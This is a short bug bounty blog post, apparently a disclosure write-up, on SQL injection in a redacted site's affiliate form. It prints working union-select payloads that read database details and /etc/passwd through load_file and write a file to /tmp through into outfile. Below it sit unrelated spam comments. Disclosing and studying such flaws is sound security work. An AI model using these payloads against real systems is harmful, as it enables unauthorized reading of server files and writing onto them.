LFI to RCE via access_log injection

on
18

SQL injection with load file and into outfile

on

Well this submission make me get the patient badge on h1 coz it’s more then 6 month (1 year) hehehehehe. I got sqli vulnerability when test with apostrophe (‘). Sorry for the redacted guys. 😛

I do register as affiliate on the web as usual.

Then got redirect to POST all form information here https://www.blablabla.com/svc/*****/form_affiliate. Select it and send to repeater. The vulnerable parameter is email.

On request box, i input this SQL command in “email” parameter ‘ and 1=2 union all select concat_ws(0x3a,version(),user(),database()) — and click Go (this command will show version, user and database name)

The result is shown on response box “5.5.41-log:root@10.130.*.**:tp_cart”. Now i try to change the SQL command with this load file command ‘ and 1=2 union all select load_file(‘/etc/passwd’) and boom! got the passwd.

Change the load file command with into outfile command to create a file on /tmp ‘ and 1=2 union all select ‘blablabla_bug_bounty_program’ into outfile ‘/tmp/blablabla’ — that command means write blablabla_bug_bounty_program into blablabla file on /tmp directory.

Now i use load file again to see the file is created or not using this command ‘ and 1=2 union all select load_file(‘/tmp/blablabla’)

And it’s created successfully! So i got sqli and also can create a file on the server.


Happy hacking guys! 😃


This article is rewrite from my other blog here.

Comments

spiceoflife said…
thanks for the post which is very useful for us https://spiceoflifecumbernauld.co.uk/
April 29, 2022 at 8:26 PM
EricFord said…
Working on the SQL s not an easy task to perform but you make it easy and convenient for us by sharing this blog, keep sharing more, Now it's time to avail HALFCASTE CREAM SET for more information.
September 8, 2022 at 2:05 PM
Daniel Oscar said…
Wonderful post. I really need this type of information regarding SQL Language. I always come to your post for programming languages. Keep sharing more posts with us in the future. Now it's time to know Best Vat Account Services in Dubai for more information.
June 23, 2023 at 2:39 AM
Peter Paul said…
Many thanks for sharing this article with us. Now I will implement these codes into my pc to overcome my some SQL problem. Now it's time to avail africa pendant for more information.
July 4, 2023 at 4:58 PM
Jacob Martin said…
I liked your post and I am waiting for your new update excellent platform for sharing your knowledge with others. Now read more about can dogs eat pesto for more information.
July 8, 2023 at 2:57 PM
Chris Holland said…
This blog post is an insightful exploration of SQL injection techniques involving "load file" and "into outfile." Thanks for sharing this blogpost with us. Now read more about luxury Airport Transport Services in Las Vegas, NV for more information.
August 10, 2023 at 1:43 AM
Henna Bakker said…
It is important to avoid any kind of unethical or illegal activities such as SQL injection or unauthorized access when using databases. If you have any questions regarding the ethical and legal use of databases or need assistance with legitimate topics, please feel free to ask me. I am here to help you. Additionally, I have experience with thesis writing services in the UK.
December 5, 2023 at 1:01 PM
American Wiki Writing said…
If you are a university student then you probably go through the mess of many assignments at a time and you don’t know how to handle that, Or in some cases, you don’t even know the approach to use to make it. So, this is where the Assignment Writing Consultants come in. They understand every need of the assignment and then help you create plans accordingly. And even help you write complete assignments.
April 26, 2024 at 8:07 PM
Post a Comment